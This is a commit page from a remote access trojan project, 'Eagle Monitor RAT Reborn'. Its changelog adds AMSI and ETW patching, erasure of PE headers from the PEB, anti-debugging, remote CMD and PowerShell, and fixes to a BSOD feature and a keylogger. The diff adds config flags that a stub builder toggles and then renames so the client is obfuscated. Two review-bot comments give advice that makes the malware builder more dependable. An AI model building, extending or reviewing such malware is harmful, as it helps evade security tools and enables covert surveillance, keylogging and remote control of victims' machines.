
3.2.3.0
* [New][Client] Patch AMSI
* [New][Client] Patch ETW
* [New][Client] Erase PE from PEB
* [New][Client] Anti-Debug
* [Tweaks] Added 'Optimize' attribute for csc compiler
* [New] Added Remote CMD
* [New] Added Remote Powershell
* [Fix] BSOD was not working (wrong status code)
* [Fix] Null reference with keylogger socket
arsium committed Nov 13, 2022
1 parent 4f1a6cf commit bdf39fa
Showing 232 changed files with 3,157 additions and 454 deletions.
1 change: 1 addition & 0 deletions Remote Access Tool/C2/C2.csproj
Expand Up @@ -30,6 +30,7 @@
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<None Include="App.config" />
5 changes: 5 additions & 0 deletions Remote Access Tool/C2/client.cs
Expand Up @@ -29,6 +29,10 @@ public static class Config
public static string mutex = "%MUTEX%";
public static Offline.Persistence.Method installationMethod = Offline.Persistence.Method.NONE;
public static string[] installationParam = new string[] { AppDomain.CurrentDomain.FriendlyName };
public static bool blockETW = false;
public static bool blockAMSI = false;
public static bool erasePEFromPEB = false;
public static bool antiDBG = false;
}
public class StarterClass
{
Expand Down Expand Up @@ -111,6 +115,7 @@ internal static void StartOfflineKeylogger()
[MTAThread]
public static void Main()
{
Offline.Special.Parser.Parse(Config.blockAMSI, Config.blockETW, Config.erasePEFromPEB, Config.antiDBG);
MakeInstall();
OneInstance();

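Review bot: The four `public static bool` flags added to `Config` (`blockETW`, `blockAMSI`, `erasePEFromPEB`, `antiDBG`) are marker declarations that the builder (StubBuilder.cs in this same commit) patches by literal text replacement of `bool <name> = false;` and then renames by identifier, but nothing at the declaration says so, so renaming a field or splitting its initializer would silently ship a client with the option still off. I would put one comment above the new fields: `// Builder markers: StubBuilder text-replaces the literal "bool <name> = false;" and renames these identifiers — keep the declaration form and names in sync with BuildClient().` Whether the builder verifies that a marker was actually found I can't tell from this hunk. The `Config` class and `Main` both continue outside the visible hunks.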
Binary file not shown.
@@ -1 +1 @@
cda5eb7bc6e232f33e621e1a1a38483d03ae39f6
105dcd742de8ee0e0a6fddc63b452b7228bc3b02
Binary file modified Remote Access Tool/C2/obj/Release/C2.exe
Binary file not shown.
Binary file modified Remote Access Tool/C2/obj/Release/C2.pdb
Binary file not shown.
Binary file not shown.
50 changes: 45 additions & 5 deletions Remote Access Tool/Eagle Monitor RAT Reborn/Builder/StubBuilder.cs
Expand Up @@ -5,8 +5,6 @@
using System.Text;
using System.Windows.Forms;
using dnlib.DotNet;
using Eagle_Monitor_RAT_Reborn.Controls;
using static Eagle_Monitor_RAT_Reborn.Network.ClientHandler;

/*
|| AUTHOR Arsium ||
Expand Down Expand Up @@ -56,18 +54,54 @@ internal static bool BuildClient()
if (Program.mainForm.offKeyloguna2CheckBox.Checked)
{
LogStep("Setting offline keylogger..." + Environment.NewLine);
stub = stub.Replace("static bool offKeylog = false;", "static bool offKeylog = true;");
stub = stub.Replace("bool offKeylog = false;", "bool offKeylog = true;");
}
else
LogStep("Skipping offline keylogger..." + Environment.NewLine);


if (Program.mainForm.patchETWGuna2CheckBox.Checked)
{
LogStep("Setting etw patch..." + Environment.NewLine);
stub = stub.Replace("bool blockETW = false;", "bool blockETW = true;");
}
else
LogStep("Skipping etw patch..." + Environment.NewLine);


if (Program.mainForm.patchAMSIGuna2CheckBox.Checked)
{
LogStep("Setting amsi patch..." + Environment.NewLine);
stub = stub.Replace("bool blockAMSI = false;", "bool blockAMSI = true;");
}
else
LogStep("Skipping amsi patch..." + Environment.NewLine);


if (Program.mainForm.erasePEHeadersGuna2CheckBox.Checked)
{
LogStep("Setting PE headers eraser..." + Environment.NewLine);
stub = stub.Replace("bool erasePEFromPEB = false;", "bool erasePEFromPEB = true;");
}
else
LogStep("Skipping PE headers eraser..." + Environment.NewLine);


if (Program.mainForm.antiDebugGuna2CheckBox.Checked)
{
LogStep("Setting anti-debug..." + Environment.NewLine);
stub = stub.Replace("bool antiDBG = false;", "bool antiDBG = true;");
}
else
LogStep("Skipping anti-debug..." + Environment.NewLine);


LogStep("Renaming code..." + Environment.NewLine);

stub = Rename(stub, "hosts");
stub = Rename(stub, "hostLists");
stub = Rename(stub, "generalKey");
stub = Rename(stub, "Config");
stub = Rename(stub, "offKeylog");
stub = Rename(stub, "installationParam");
stub = Rename(stub, "installationMethod");
stub = Rename(stub, "StarterClass");
Expand All @@ -88,7 +122,7 @@ internal static bool BuildClient()
stub = Rename(stub, "EndPacketRead");
stub = Rename(stub, "SendDataCompleted");
stub = Rename(stub, "EndConnect");

//
stub = Rename(stub, "ReadDataAsync");
stub = Rename(stub, "readDataAsync");

Expand All @@ -101,6 +135,12 @@ internal static bool BuildClient()
stub = Rename(stub, "SendDataAsync");
stub = Rename(stub, "sendDataAsync");
stub = Rename(stub, "SendData");
//
stub = Rename(stub, "offKeylog");
stub = Rename(stub, "antiDBG");
stub = Rename(stub, "erasePEFromPEB");
stub = Rename(stub, "blockAMSI");
stub = Rename(stub, "blockETW");

File.WriteAllText(Application.StartupPath + "\\Stubs\\clienttmp.cs", stub);

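Review bot: None of the new option blocks (from the `patchETWGuna2CheckBox` branch downward, and the loosened `bool offKeylog = false;` marker above them) checks that `stub.Replace(...)` actually matched anything, so when the marker text in the stub source drifts the step still logs "Setting etw patch..." while the flag stays false, and the mismatch only surfaces at runtime. A guard per option such as `if (!stub.Contains("bool blockETW = false;")) { LogStep("Marker for blockETW not found in stub" + Environment.NewLine); return false; }` before the `Replace` would fail the build instead — I'm assuming from the `internal static bool BuildClient()` context line that returning false is the existing failure path. The marker `Replace` calls must also stay ahead of the `Rename(stub, "blockETW")` group added at the end of the method, since the markers match the original identifiers; that ordering is worth a one-line comment at the top of the option blocks, e.g. `// Patch option markers before Rename(): the marker strings use the original field names.` `BuildClient` starts before the first hunk and ends after the last one.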


